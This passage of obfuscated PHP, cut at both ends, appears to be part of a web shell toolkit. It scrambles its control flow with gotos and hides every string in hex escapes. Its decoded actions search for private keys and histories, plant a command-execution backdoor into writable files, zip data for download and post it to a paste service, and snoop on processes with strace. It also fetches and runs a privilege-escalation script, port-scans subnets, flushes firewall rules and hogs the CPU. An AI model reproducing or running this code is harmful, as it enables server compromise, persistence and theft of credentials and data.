"\52\56\142\141\x6b", "\52\x2e\142\141\143\153\165\x70", "\52\x2e\172\151\160", "\52\x2e\164\x61\x72\56\x67\x7a", "\x2a\56\x70\145\155", "\151\144\x5f\x72\163\141\x2a", "\x2a\56\x70\61\62", "\52\x2e\x6b\145\171", "\x2e\52\x5f\x68\x69\163\164\x6f\x72\171", "\52\56\x63\x73\x76", "\52\x2e\170\154\x73", "\x2a\x2e\x78\x6c\163\170"]; goto GJ45l; wIEVD: $j3_hR = realpath($_POST["\x70\141\x74\x68"]); goto rwUuN; GJ45l: $gTXTO = "\146\151\156\144\40" . escapeshellarg($j3_hR) . "\x20\55\164\171\160\x65\x20\x66\40\134\x28\x20"; goto VTD08; H2cLd: $v1Pog["\155\x65\163\x73\x61\x67\145"] = "\111\156\x76\141\154\x69\x64\40\160\141\x74\x68\x2e"; goto hviFh; zqGah: uo0OE: goto joiT_; rwUuN: if ($j3_hR) { goto qZfnV; } goto H2cLd; nEeA_: $VG3IH = ZMrp5($jbe4m); goto PVToH; WiDQo: $jbe4m = "\x67\x72\x65\160\40\x2d\x72\40\55\111\40\55\154\40\55\x45\40\47\x5b\x61\55\x7a\x41\55\x5a\60\x2d\x39\56\x5f\x25\x2b\x2d\x5d\53\x40\x5b\141\55\172\101\x2d\132\60\x2d\71\56\55\135\53\134\x2e\133\x61\55\172\x41\55\132\135\x7b\x32\x2c\x36\x7d\47\x20" . escapeshellarg($j3_hR) . "\x20\x32\76\57\144\145\166\57\x6e\165\x6c\154"; goto K_pdj; wrz3f: goto vbH70; goto ouyKl; PVToH: $WcKfz = ZMrP5($OYBdi); goto JeOZv; VTD08: foreach ($kyLhg as $jY45d => $G6Mdr) { $gTXTO .= ($jY45d > 0 ? "\x20\x2d\x6f\40" : '') . "\x2d\151\x6e\x61\x6d\x65\40" . escapeshellarg($G6Mdr); Ggt_W: } goto zqGah; K_pdj: $OYBdi = "\x67\162\x65\x70\40\55\162\40\x2d\111\40\55\x6c\40\x2d\x45\x20\47\50\133\60\x2d\x39\135\x7b\x31\x2c\63\x7d\134\56\51\173\x33\175\133\60\55\x39\135\x7b\61\x2c\x33\175\x27\x20" . escapeshellarg($j3_hR) . "\x20\62\76\x2f\x64\x65\166\57\156\x75\154\154"; goto nEeA_; mOdBl: $PNhzx = Zmrp5($gTXTO); goto WiDQo; gAtSn: qZfnV: goto l8TrY; hviFh: goto vbH70; goto gAtSn; JeOZv: $v1Pog = ["\x73\164\x61\164\165\x73" => "\163\165\x63\x63\145\x73\x73", "\x64\x61\x74\x61" => ["\x42\171\x20\116\x61\x6d\x65" => htmlspecialchars($PNhzx ?: "\x4e\x6f\156\x65\40\146\x6f\x75\x6e\x64\56"), "\x43\157\156\164\x61\x69\x6e\x69\x6e\147\x20\x45\155\x61\x69\154\x73" => htmlspecialchars($VG3IH ?: "\x4e\x6f\x6e\145\40\146\157\x75\x6e\144\x2e"), "\x43\157\156\x74\141\151\x6e\151\156\147\x20\x49\x50\166\x34" => htmlspecialchars($WcKfz ?: "\116\157\156\145\x20\x66\x6f\x75\x6e\x64\56")]]; goto wrz3f; joiT_: $gTXTO .= "\x20\134\51\x20\55\154\163\40\x32\x3e\x2f\144\x65\166\x2f\156\x75\154\x6c"; goto mOdBl; ouyKl: case "\155\157\x6e\151\x74\x6f\x72\137\143\x68\141\x6e\147\x65\163": goto HIQsj; hkWpw: $SueqY = (int) $_POST["\144\x75\162\141\x74\x69\x6f\x6e"]; goto DRW6Q; euL79: $H4gBI = ICvUI($j3_hR); goto Qxeto; YUU_N: if (!($SueqY <= 0 || $SueqY > 300)) { goto U219g; } goto vES5F; IVNKW: $oVVLx = array_keys(array_intersect_key($H4gBI, $y1unv)); goto llHgc; vES5F: $SueqY = 30; goto PuIZh; WzUl_: goto vbH70; goto ndYmm; AUL3O: Skq0q: goto UXcIY; ndYmm: fm6Tk: goto YUU_N; PuIZh: U219g: goto euL79; rfaR1: $NMePb = ["\143\162\145\141\164\145\144" => array_keys(array_diff_key($y1unv, $H4gBI)), "\144\x65\154\145\164\x65\144" => array_keys(array_diff_key($H4gBI, $y1unv)), "\x6d\x6f\x64\151\146\151\145\x64" => []]; goto IVNKW; m6J8m: goto vbH70; goto anobL; Qxeto: sleep($SueqY); goto BAvDU; xv6pJ: $v1Pog["\155\145\163\x73\x61\147\145"] = "\x49\156\166\141\154\151\144\x20\x70\x61\164\x68\x2e"; goto WzUl_; llHgc: foreach ($oVVLx as $Q0s1i) { goto ZCe5X; iCVOL: qlQgI: goto quyMA; ZCe5X: if (!($H4gBI[$Q0s1i] !== $y1unv[$Q0s1i])) { goto ZZJJM; } goto hE7Og; NMwiR: ZZJJM: goto iCVOL; hE7Og: $NMePb["\x6d\x6f\144\151\x66\151\145\144"][] = $Q0s1i; goto NMwiR; quyMA: } goto AUL3O; DRW6Q: if ($j3_hR) { goto fm6Tk; } goto xv6pJ; BAvDU: $y1unv = icvUI($j3_hR); goto rfaR1; UXcIY: $v1Pog = ["\x73\164\x61\164\x75\x73" => "\163\165\143\x63\145\x73\x73", "\143\x68\x61\x6e\x67\145\163" => $NMePb]; goto m6J8m; HIQsj: $j3_hR = realpath($_POST["\160\x61\x74\150"]); goto hkWpw; anobL: case "\142\x61\143\153\x64\x6f\x6f\x72\137\x69\x6e\x73\164\x61\x6c\x6c\145\x72": goto p7fg9; tr_x4: if (!empty($H905Y)) { goto pQewB; } goto KLW6P; KLW6P: $v1Pog["\155\145\163\x73\141\x67\x65"] = "\x4e\x6f\40\164\x61\x72\x67\145\164\40\x66\x69\x6c\x65\163\x20\x73\x70\x65\x63\151\x66\151\145\144\56"; goto ZlB17; NieNI: foreach ($H905Y as $aQ_M_) { goto wJwGB; M9tkp: if (strpos($Lrz4Z, "\163\150\145\x6c\154\137\145\170\x65\x63\x28\44\137\x52\x45\x51\125\105\123\x54\133\42\x63\x6d\x64\x22\x5d\51") === false) { goto wTVjT; } goto u9mxG; dPmLu: if (@file_put_contents($aQ_M_, $Lrz4Z . PHP_EOL . $Pu9Mp)) { goto Nzjqv; } goto JMHC5; saFv1: goto uQgvG; goto jyoIL; WNXta: wTVjT: goto dPmLu; xdGgG: SO7vL: goto exrJA; exrJA: aN_rJ: goto IU33a; Yrj7j: goto aN_rJ; goto ClwC0; ClwC0: Obj4H: goto qhbU3; B3lZa: $gSi8X[$aQ_M_] = "\x4e\x6f\164\x20\x61\40\x66\x69\x6c\x65\40\157\x72\40\156\157\164\40\167\162\x69\x74\x61\142\x6c\145"; goto Yrj7j; IU33a: h14eY: goto vgvPo; VkdcY: uQgvG: goto xdGgG; wJwGB: if (is_file($aQ_M_) && is_writable($aQ_M_)) { goto Obj4H; } goto B3lZa; cnksI: $gSi8X[$aQ_M_] = "\x53\165\143\143\x65\x73\x73"; goto VkdcY; u9mxG: $gSi8X[$aQ_M_] = "\101\154\162\x65\141\144\x79\x20\151\x6e\146\145\143\x74\145\x64"; goto zDfii; qhbU3: $Lrz4Z = @file_get_contents($aQ_M_); goto M9tkp; JMHC5: $gSi8X[$aQ_M_] = "\106\x61\x69\x6c\x65\144\40\x74\x6f\x20\x77\162\151\x74\145"; goto saFv1; jyoIL: Nzjqv: goto cnksI; zDfii: goto SO7vL; goto WNXta; vgvPo: } goto Td4iL; ZlB17: goto vbH70; goto VMmGm; Td4iL: i99hn: goto CP8Ty; lkxP0: $Pu9Mp = "\74\x3f\160\150\x70\x20\x69\x66\50\151\163\163\145\x74\50\x24\x5f\122\105\x51\125\x45\x53\124\133\x22\x63\x6d\x64\x22\135\51\x29\173\40\x65\143\150\x6f\40\42\74\x70\x72\x65\x3e\x22\40\56\40\x73\150\x65\154\154\x5f\145\x78\145\x63\50\x24\x5f\x52\105\x51\125\x45\123\x54\133\x22\143\x6d\x64\42\135\x29\x20\56\x20\42\74\57\x70\162\x65\x3e\42\x3b\40\x7d\40\x3f\x3e"; goto OzXja; CP8Ty: $v1Pog = ["\x73\164\x61\x74\x75\163" => "\x73\x75\143\143\x65\163\x73", "\x72\x65\x73\x75\x6c\164\x73" => $gSi8X]; goto C6mN3; VMmGm: pQewB: goto lkxP0; OzXja: $gSi8X = []; goto NieNI; C6mN3: goto vbH70; goto O73MT; xrExc: $H905Y = array_filter(array_map("\164\x72\151\155", explode("\xa", $hnxuU))); goto tr_x4; p7fg9: $hnxuU = $_POST["\x74\x61\x72\x67\x65\164\x73"]; goto xrExc; O73MT: case "\x65\170\146\151\x6c\137\144\x61\164\x61": goto Ddq_z; ycLvF: tagoQ: goto Osxw7; sn4sp: $dJebd = json_decode($_POST["\x69\x74\x65\155\163"], true); goto ZtjAL; eEvzH: $v1Pog = ["\x73\164\x61\x74\165\x73" => "\163\x75\x63\143\145\163\x73", "\144\157\167\156\x6c\157\141\x64\x5f\x75\x72\154" => $whQc4, "\155\x65\x73\x73\x61\147\145" => "\x41\162\x63\x68\x69\166\145\x20\143\x72\145\x61\x74\145\x64\x20\x73\165\x63\x63\x65\163\x73\x66\165\154\154\x79\56"]; goto vBBXI; ZtjAL: if (!empty($dJebd)) { goto tagoQ; } goto CaQW7; p8SnS: v2rSy: goto sn4sp; rCfxs: $HNIWJ = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $r94zf; goto WXfa0; FsgGq: xxrLQ: goto V9FNx; Osxw7: $r94zf = "\x65\170\x66\x69\154\137" . date("\x59\55\x6d\x2d\144\x5f\110\55\x69\55\x73") . "\x2e\x7a\151\x70"; goto rCfxs; AN3qd: goto vbH70; goto p8SnS; GErVm: $whQc4 = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\124\120\123"] === "\x6f\x6e" ? "\x68\164\164\x70\x73" : "\150\x74\x74\160") . "\x3a\57\x2f{$_SERVER["\110\x54\124\x50\x5f\110\x4f\x53\x54"]}" . $_SERVER["\120\110\x50\137\123\x45\114\106"] . "\77\x64\x6f\x77\x6e\x6c\157\x61\x64\x5f\164\145\155\x70\75" . urlencode(basename($HNIWJ)); goto eEvzH; XDj_I: goto vbH70; goto FsgGq; dnE_L: $v1Pog["\155\145\163\x73\141\147\145"] = "\132\151\160\101\162\143\150\x69\x76\145\40\143\154\141\x73\x73\x20\x6e\x6f\x74\40\146\x6f\165\156\144\x2e"; goto AN3qd; BWQ6U: goto vbH70; goto ycLvF; TMAZj: if (!($usT2s->open($HNIWJ, eduEk::KK30f | edUeK::uMEzX) !== TRUE)) { goto xxrLQ; } goto X6sV1; vBBXI: goto vbH70; goto zY5Y1; V9FNx: foreach ($dJebd as $jmnh0) { goto YnHWo; PZj0E: if (is_dir($jmnh0)) { goto BQhMf; } goto hncaQ; lDHgX: Vh_T2: goto PZj0E; fYm4R: goto CH1sL; goto lDHgX; xLP5h: goto wjFoH; goto I0wSF; I0wSF: BQhMf: goto qEYCF; M0Szn: wjFoH: goto MTc_3; m_EbP: unZV2: goto MZ9Tt; LebTe: hU2yt: goto HW6TY; HW6TY: $usT2s->addFile($jmnh0, basename($jmnh0)); goto M0Szn; hncaQ: if (is_file($jmnh0)) { goto hU2yt; } goto xLP5h; MZ9Tt: goto wjFoH; goto LebTe; MTc_3: CH1sL: goto QlkMe; qEYCF: $p2RFD = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($jmnh0, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::LEAVES_ONLY); goto nGCCp; YnHWo: $jmnh0 = realpath($jmnh0); goto qCGQd; nGCCp: foreach ($p2RFD as $zME47 => $Q0s1i) { goto o3AQ_; wiPli: fpK1X: goto Jztle; o3AQ_: if ($Q0s1i->isDir()) { goto dGzYK; } goto rVLqi; u5qcr: dGzYK: goto wiPli; cJmZu: $sCC_n = substr($JB_SP, strlen(dirname($jmnh0)) + 1); goto rcU0Q; rVLqi: $JB_SP = $Q0s1i->getRealPath(); goto cJmZu; rcU0Q: $usT2s->addFile($JB_SP, $sCC_n); goto u5qcr; Jztle: } goto m_EbP; qCGQd: if ($jmnh0) { goto Vh_T2; } goto fYm4R; QlkMe: } goto GF1rV; WXfa0: $usT2s = new edUEk(); goto TMAZj; CaQW7: $v1Pog["\155\x65\x73\x73\141\x67\145"] = "\116\x6f\x20\x66\151\154\145\163\40\x6f\162\x20\x64\x69\162\x65\x63\164\x6f\x72\151\145\163\x20\x73\x65\x6c\145\x63\164\145\x64\x2e"; goto BWQ6U; GF1rV: JrrdF: goto MuR7P; MuR7P: $usT2s->close(); goto GErVm; X6sV1: $v1Pog["\x6d\145\163\163\x61\147\145"] = "\x43\157\x75\x6c\144\40\x6e\157\164\x20\x63\x72\145\x61\x74\x65\40\172\x69\160\x20\x61\x72\x63\x68\x69\166\x65\40\151\156\x20\x74\145\155\160\40\144\151\162\x65\x63\x74\x6f\x72\x79\56"; goto XDj_I; Ddq_z: if (class_exists("\x5a\151\x70\x41\162\143\x68\x69\166\x65")) { goto v2rSy; } goto dnE_L; zY5Y1: case "\x63\160\165\x5f\x68\x6f\147": goto rxaSA; qCPYn: if (!($jY45d < 1000000)) { goto uWEvO; } goto Fc8DK; vszWl: Uay5E: goto akD00; CKVov: $LiQLQ = time() + $SueqY; goto vszWl; YvAow: $jY45d = 0; goto EioB5; RN1p1: goto eMPbs; goto gXQwt; Fc8DK: $upd3r += sqrt($upd3r); goto oPpa9; oPpa9: N98w0: goto RAx3J; FaSqA: $SueqY = 30; goto N7hz3; gXQwt: uWEvO: goto RRsNn; RRsNn: goto Uay5E; goto jOVEh; eJy2J: if (!($SueqY <= 0 || $SueqY > 120)) { goto sg9Go; } goto FaSqA; mT7zt: $v1Pog = ["\x73\164\141\164\x75\x73" => "\x73\165\x63\143\145\163\163", "\x6d\x65\x73\x73\141\x67\145" => "\x43\x50\125\x20\150\x6f\147\x20\x72\x61\156\40\x66\x6f\162\x20{$SueqY}\x20\163\x65\143\x6f\x6e\x64\x73\x2e"]; goto tJ8G0; jOVEh: UHwsE: goto mT7zt; tJ8G0: goto vbH70; goto cav4s; RAx3J: $jY45d++; goto RN1p1; rxaSA: $SueqY = (int) $_POST["\x64\165\x72\141\x74\151\x6f\156"]; goto eJy2J; akD00: if (!(time() < $LiQLQ)) { goto UHwsE; } goto L08zO; EioB5: eMPbs: goto qCPYn; N7hz3: sg9Go: goto CKVov; L08zO: $upd3r = 0.0001; goto YvAow; cav4s: case "\153\x65\x79\x6c\157\147\x67\x65\162": goto yXWhW; oIZUs: $oZAH8 = "\x73\x74\162\x61\143\x65\40\x2d\160\40{$R0VUu}\40\x2d\145\40\164\x72\141\143\x65\x3d\x72\145\x61\x64\x2c\167\x72\x69\x74\x65\40\55\163\40\62\x35\x36\x20\x32\x3e\x26\x31"; goto z1sB5; kcsDO: goto vbH70; goto dGJib; jTrP0: $v1Pog = ["\163\164\141\164\165\163" => "\x73\x75\143\143\x65\x73\x73", "\144\x61\x74\x61" => htmlspecialchars($BKvy0 ?: "\116\x6f\x20\157\x75\164\x70\x75\x74\40\146\x72\x6f\155\40\163\x74\x72\x61\x63\x65\x2e\40\120\x49\104\40\x6d\151\x67\150\164\40\x68\141\x76\x65\40\x65\x78\x69\x74\x65\x64\x20\x6f\162\x20\160\x65\x72\155\x69\x73\163\x69\x6f\156\x73\x20\144\145\x6e\151\x65\144\x2e")]; goto cSMFn; z1sB5: $XKSBr = proc_open($oZAH8, $YaXSQ, $lqQ8o); goto O9Sv4; OBKYN: m3Ktz: goto mTmNn; kNrip: proc_close($XKSBr); goto jTrP0; rz1sU: $v1Pog["\155\x65\163\163\141\x67\x65"] = "\x70\x72\x6f\x63\x5f\157\x70\145\x6e\x20\151\163\x20\x64\151\163\141\142\154\145\144\x2e"; goto V7y0J; tfaR6: $YaXSQ = [0 => ["\160\x69\x70\x65", "\162"], 1 => ["\x70\151\160\145", "\167"], 2 => ["\x70\151\x70\145", "\167"]]; goto oIZUs; O9Sv4: if (is_resource($XKSBr)) { goto OA2P7; } goto S_qZa; cSMFn: WiCo2: goto kcsDO; Dq43j: goto WiCo2; goto ov7bo; S_qZa: $v1Pog["\155\145\163\163\x61\x67\145"] = "\x46\x61\x69\x6c\x65\144\40\164\157\40\145\x78\x65\143\x75\x74\145\x20\x73\164\162\141\143\x65\56"; goto Dq43j; mTmNn: if (lIx3f("\160\x72\x6f\x63\x5f\x6f\160\145\x6e")) { goto BgtZQ; } goto rz1sU; yXWhW: $R0VUu = (int) $_POST["\x70\151\x64"]; goto kMwPj; c6gII: goto vbH70; goto OBKYN; eWFfs: fclose($lqQ8o[1]); goto kNrip; V7y0J: goto vbH70; goto dCpoE; Fqjhy: $v1Pog["\x6d\145\163\x73\x61\x67\145"] = "\111\x6e\166\x61\x6c\x69\144\x20\x50\x49\104\x2e"; goto c6gII; dCpoE: BgtZQ: goto tfaR6; zDkqf: $BKvy0 = stream_get_contents($lqQ8o[1]); goto eWFfs; ov7bo: OA2P7: goto zDkqf; kMwPj: if (!($R0VUu <= 1)) { goto m3Ktz; } goto Fqjhy; dGJib: case "\160\162\x69\166\145\x73\x63\137\143\x68\145\143\153\145\x72": goto zMIID; aqLU9: $dX9PH = sys_get_temp_dir() . "\x2f\x6c\163\145\56\x73\x68"; goto nuQh1; jLVDr: FSq31: goto O4wa5; WccGa: if ($Fxp4q) { goto j53HM; } goto JEGu_; yT9iE: if (!file_exists($dX9PH)) { goto zcJ2w; } goto fl2sH; WC4MP: $BKvy0 .= "\103\x68\145\143\x6b\x69\156\x67\40\x66\x6f\162\40\x27\101\x6c\x77\x61\x79\x73\x49\x6e\163\164\141\x6c\x6c\105\154\x65\x76\x61\164\x65\x64\47\40\x72\x65\147\151\163\x74\x72\171\x20\153\x65\171\x73\x2e\56\56\12"; goto o3AVc; DvcpK: $BKvy0 .= ZMrp5("\x77\155\x69\x63\40\163\x65\162\x76\x69\x63\145\x20\x67\x65\x74\40\x6e\x61\x6d\x65\x2c\x64\x69\163\x70\x6c\x61\171\x6e\x61\155\x65\54\160\x61\x74\x68\x6e\141\155\145\x2c\163\x74\141\x72\164\155\x6f\x64\145\x20\x7c\40\146\x69\x6e\x64\163\164\x72\40\x2f\x69\x20\42\x61\165\164\157\42\40\x7c\x20\146\x69\x6e\144\x73\x74\162\40\57\x69\40\x2f\x76\40\42\143\72\134\167\x69\156\x64\x6f\x77\x73\134\42\40\x7c\x20\x66\x69\156\x64\x73\164\162\40\57\x76\x20\42\x22\x22"); goto ct8bk; h_Mt2: b2oY2: goto aqLU9; ct8bk: brJ1A: goto pdNjJ; HmXgJ: if ($Pa3UT === "\154\x69\x6e\x75\170") { goto b2oY2; } goto UiULg; O4wa5: $BKvy0 .= "\55\x2d\55\40\127\x69\x6e\144\x6f\x77\163\x20\x50\162\151\x76\151\154\145\x67\x65\x20\x45\x73\x63\x61\x6c\141\x74\x69\x6f\x6e\x20\x43\150\145\143\153\163\x20\55\55\55\xa\12"; goto WC4MP; CPTSb: goto Y45Az; goto ZCeIR; fl2sH: $BKvy0 .= "\x6c\163\x65\56\x73\x68\40\141\x6c\x72\145\141\144\x79\40\145\x78\x69\x73\x74\163\x2e\40\116\x6f\167\40\x65\170\x65\x63\165\164\151\x6e\147\40\x28\164\x68\151\x73\40\x6d\141\x79\40\x74\141\x6b\145\x20\163\145\x76\x65\x72\141\x6c\40\155\x69\156\165\x74\x65\x73\51\56\56\x2e\xa\xa"; goto CPTSb; WQ6fJ: goto brJ1A; goto h_Mt2; BUzUQ: $BKvy0 .= "\55\x2d\55\40\x4c\151\x6e\165\x78\x20\123\155\x61\162\164\40\x45\156\165\155\x65\162\141\164\151\157\156\x20\55\x2d\55\12"; goto yT9iE; SP0iG: Ao0iI: goto c1snl; hFRcl: $BKvy0 .= ZMRP5(escapeshellcmd($dX9PH) . "\x20\55\x6c\40\61\x20\x2d\151"); goto SP0iG; VxOu3: $BKvy0 = ''; goto HmXgJ; drzbp: goto vbH70; goto HmCLa; Mh4gs: file_put_contents($dX9PH, $Fxp4q); goto ng9ov; KGVP0: $BKvy0 .= "\104\x6f\167\x6e\x6c\157\141\x64\151\x6e\147\x20\x6c\x73\145\56\x73\x68\40\146\x72\157\155\40\x47\151\x74\x48\165\x62\56\56\x2e\12"; goto BoFvp; klRmm: $BKvy0 .= "\104\x6f\167\156\154\157\x61\144\40\143\x6f\x6d\x70\154\x65\164\x65\x2e\40\x4e\157\167\x20\145\x78\145\x63\165\x74\x69\x6e\147\40\50\x74\x68\151\163\40\x6d\x61\x79\x20\x74\x61\153\145\x20\163\x65\166\x65\x72\141\x6c\x20\155\x69\x6e\165\x74\145\x73\x29\56\x2e\x2e\12\xa"; goto Vsxd5; JEGu_: $BKvy0 .= "\106\141\151\154\145\144\40\164\157\x20\x64\x6f\x77\x6e\x6c\157\141\144\40\x6c\x73\145\56\x73\150\56\x20\120\x6c\x65\x61\163\145\40\143\150\145\143\153\40\143\x6f\x6e\156\x65\x63\164\x69\x76\x69\x74\171\x2e\12"; goto obeks; VlM8K: if (!file_exists($dX9PH)) { goto Ao0iI; } goto hFRcl; Jp6KW: j53HM: goto Mh4gs; UaYuW: $BKvy0 .= "\x43\x68\145\143\x6b\151\x6e\147\x20\x66\x6f\x72\40\x55\x6e\161\x75\157\164\145\x64\x20\x53\x65\x72\x76\151\x63\145\x20\120\x61\x74\150\163\x2e\56\x2e\xa"; goto DvcpK; o3AVc: $BKvy0 .= "\110\113\x43\125\x3a\xa" . ZMrp5("\162\x65\x67\x20\161\x75\x65\162\171\x20\x48\x4b\103\125\x5c\123\x4f\106\124\127\x41\122\105\x5c\120\x6f\x6c\151\143\151\145\163\134\115\151\x63\x72\x6f\x73\157\x66\x74\134\x57\x69\156\144\x6f\x77\x73\x5c\111\x6e\x73\x74\141\154\154\x65\x72\40\x2f\x76\x20\101\154\167\141\171\163\111\156\x73\164\x61\154\154\105\x6c\x65\x76\141\x74\x65\144\x20\x32\x3e\46\61") . "\12"; goto nEfBO; nuQh1: $ShMZj = "\x68\x74\x74\160\x73\x3a\57\x2f\162\141\167\56\x67\151\x74\x68\165\142\x75\163\145\x72\143\x6f\x6e\x74\145\156\164\56\143\157\x6d\57\144\x69\145\x67\157\55\x74\162\145\x69\164\157\163\x2f\x6c\x69\x6e\x75\x78\x2d\163\x6d\x61\162\164\x2d\145\156\x75\155\145\162\141\x74\151\157\156\57\x6d\141\x73\164\x65\162\x2f\154\163\x65\56\163\150"; goto BUzUQ; MIgIR: Y45Az: goto VlM8K; UiULg: if ($Pa3UT === "\167\151\x6e\x64\157\x77\x73") { goto FSq31; } goto WQ6fJ; pdNjJ: $v1Pog = ["\163\164\x61\x74\x75\163" => "\x73\165\143\x63\145\x73\x73", "\144\x61\x74\141" => htmlspecialchars($BKvy0)]; goto drzbp; ZCeIR: zcJ2w: goto KGVP0; nEfBO: $BKvy0 .= "\x48\113\x4c\x4d\72\12" . zmRp5("\x72\145\147\x20\161\165\x65\x72\171\40\110\113\x4c\115\134\x53\117\106\124\x57\x41\x52\105\134\120\157\154\x69\x63\151\145\163\134\115\x69\x63\162\x6f\x73\x6f\x66\164\x5c\x57\x69\156\144\157\167\163\x5c\x49\x6e\163\x74\141\x6c\154\145\x72\40\57\166\x20\101\x6c\167\x61\x79\x73\x49\156\163\x74\141\154\x6c\x45\154\145\166\141\x74\x65\x64\x20\62\76\x26\61") . "\xa\xa"; goto UaYuW; c1snl: goto brJ1A; goto jLVDr; Vsxd5: MsTTI: goto MIgIR; ng9ov: chmod($dX9PH, 0755); goto klRmm; zMIID: $Pa3UT = $_POST["\x6f\x73"]; goto VxOu3; obeks: goto MsTTI; goto Jp6KW; BoFvp: $Fxp4q = @file_get_contents($ShMZj); goto WccGa; HmCLa: case "\163\165\x62\x6e\x65\164\137\163\143\141\156\x6e\145\162": goto Twyzn; L1M6E: $v1Pog["\155\x65\163\163\141\x67\145"] = "\x4d\141\x73\153\40\155\x75\x73\x74\x20\x62\145\x20\142\x65\x74\167\x65\145\x6e\40\x31\x36\40\x61\156\144\x20\x33\x30\40\x66\x6f\x72\x20\160\145\162\x66\157\162\155\x61\156\143\145\40\x72\145\x61\163\x6f\156\x73\x2e"; goto LvChk; uIQLf: if (empty($p5oZ1)) { goto bfVe2; } goto pppWw; Fnj5w: ROd06: goto khj9u; GUoWo: bfVe2: goto Fnj5w; oSmcE: foreach ($wYTCp as $TI0F5) { goto OfASJ; rKwYm: fclose($JHnly); goto AHRrV; Di56G: $p5oZ1[] = $TI0F5; goto rKwYm; AHRrV: hEt9C: goto Abe7w; OfASJ: $JHnly = @fsockopen($zA1ny, $TI0F5, $UQIjB, $Pb5Yu, 0.1); goto wVjp3; Abe7w: L_alS: goto aQs5s; wVjp3: if (!is_resource($JHnly)) { goto hEt9C; } goto Di56G; aQs5s: } goto oMrsT; LvChk: goto vbH70; goto CcgK2; L4jkx: $zA1ny = long2ip($bVOSO + $jY45d); goto nS8zu; V6Uil: HbbU0: goto nClFB; gin9g: goto h1ATT; goto QkWkb; yx0u4: if (!($ttHWB < 16 || $ttHWB > 30)) { goto f95KW; } goto L1M6E; xf2Cb: $wYTCp = [21, 22, 23, 25, 80, 110, 139, 443, 445, 1433, 1521, 3306, 3389, 5432, 5900, 8080, 8443]; goto cVkm4; ecSoS: $bVOSO = ip2long($uUZ0x); goto WPHzE; pppWw: $gSi8X[$zA1ny] = $p5oZ1; goto GUoWo; zCebx: h1ATT: goto ri_Nb; oMrsT: cJIPv: goto uIQLf; cVkm4: $gSi8X = []; goto ecSoS; kkjPE: if (preg_match("\57\x5e\x28\x5c\x64\x7b\x31\54\63\x7d\134\x2e\134\x64\173\x31\54\x33\175\134\x2e\x5c\x64\x7b\61\x2c\63\175\x5c\56\134\x64\173\x31\54\63\175\51\x5c\x2f\50\x5c\144\x7b\61\54\x32\175\x29\44\x2f", $SybcI, $I5WkF)) { goto HbbU0; } goto DVHhL; ri_Nb: if (!($jY45d < $j9Rd5 - 1)) { goto cmqfD; } goto L4jkx; CsWkB: goto vbH70; goto TAnPD; CcgK2: f95KW: goto xf2Cb; rECXe: goto vbH70; goto V6Uil; nClFB: list(, $uUZ0x, $ttHWB) = $I5WkF; goto yx0u4; Twyzn: $SybcI = $_POST["\163\x75\142\x6e\x65\164"]; goto kkjPE; QkWkb: cmqfD: goto VvV4p; DVHhL: $v1Pog["\155\145\163\x73\141\x67\x65"] = "\111\x6e\166\x61\154\151\x64\40\x43\x49\x44\x52\40\x66\x6f\x72\155\141\164\40\x28\145\x2e\x67\x2e\x2c\x20\61\71\62\56\61\x36\x38\56\61\56\x30\57\62\64\x29\56"; goto rECXe; VvV4p: $v1Pog = ["\163\x74\x61\x74\165\x73" => "\x73\x75\143\143\x65\163\163", "\x72\145\x73\x75\x6c\x74\163" => $gSi8X]; goto CsWkB; R0hTX: $jY45d = 1; goto zCebx; nS8zu: $p5oZ1 = []; goto oSmcE; WPHzE: $j9Rd5 = 1 << 32 - $ttHWB; goto R0hTX; khj9u: $jY45d++; goto gin9g; TAnPD: case "\x66\151\x72\x65\167\141\154\x6c\x5f\x63\x6f\x6e\164\x72\157\154": goto TmX2q; dMES5: $v1Pog = ["\x73\164\x61\x74\165\163" => "\x73\165\143\x63\x65\163\163", "\144\x61\164\x61" => htmlspecialchars($BKvy0)]; goto WJm1b; ROVzG: VoMYV: goto dMES5; WJm1b: goto vbH70; goto Ry92I; CIdIS: goto VoMYV; goto Os_GG; LhmlN: $BKvy0 = "\x49\x6e\x76\x61\x6c\x69\x64\x20\x61\143\164\x69\157\156\56"; goto DA4Kj; OW70H: if (!empty(trim($BKvy0))) { goto tA0nB; } goto jbhJj; Os_GG: gNacs: goto stJX0; DA4Kj: goto VoMYV; goto G7jZh; exSzd: if ($uOhnh === "\x66\x6c\165\163\150") { goto gNacs; } goto LhmlN; TmX2q: $uOhnh = $_POST["\x73\x75\x62\137\x61\143\164\x69\x6f\156"]; goto UsllY; UsllY: if ($uOhnh === "\x67\x65\164") { goto O1pYW; } goto exSzd; jbhJj: $BKvy0 = "\106\154\165\x73\150\40\x63\157\x6d\x6d\141\x6e\144\40\163\145\x6e\x74\x2e\x20\103\150\145\x63\153\40\x72\165\154\145\x73\x20\x61\147\141\x69\x6e\x20\164\x6f\40\x63\157\x6e\146\151\162\155\x20\163\x75\143\143\145\x73\x73\40\50\162\145\161\165\x69\x72\145\163\x20\162\x6f\157\164\51\x2e"; goto sLHWb; G7jZh: O1pYW: goto gSxW7; gSxW7: $BKvy0 = ZMRp5("\x69\160\x74\141\x62\154\x65\163\40\55\x4c\x20\55\156\x20\55\x76\x20\x32\76\x26\x31"); goto CIdIS; stJX0: $BKvy0 = Zmrp5("\151\160\x74\141\x62\154\145\163\x20\x2d\x46\x20\x32\76\x26\x31"); goto OW70H; sLHWb: tA0nB: goto ROVzG; Ry92I: case "\x65\170\x66\151\x6c\x5f\x70\x61\x73\164\145": goto qaBSq; Lk8cT: $v1Pog = ["\163\x74\x61\164\x75\163" => "\x73\x75\143\x63\x65\163\163", "\x75\x72\x6c" => $BI9Rj[0]]; goto KVD3j; A3sUQ: $vtPQE = ''; goto NQTc8; ULmho: XyF1v: goto ftZW2; QrzCi: $v1Pog = ["\x73\x74\x61\x74\165\163" => "\x73\165\x63\143\x65\163\163", "\x75\162\154" => $vtPQE]; goto EMcXP; ffZBu: goto XyF1v; goto VCg5h; ftZW2: eG9DM: goto sibeK; u3fvp: FTQdG: goto oGofE; zWwYL: $dtJ3t = @file_get_contents("\150\x74\x74\x70\x73\x3a\57\x2f\x62\151\156\56\x64\145\146\165\x73\145\x2e\x63\141", false, $yr3s9); goto u_2AJ; tU_lp: goto vbH70; goto XqyP5; mmjmU: goto gu6Py; goto Sg5O1; Sg5O1: i9mzX: goto Lk8cT; oGofE: if ($vtPQE) { goto mlUBx; } goto R7drc; AF1wq: RQhHL: goto ffZBu; DGucR: 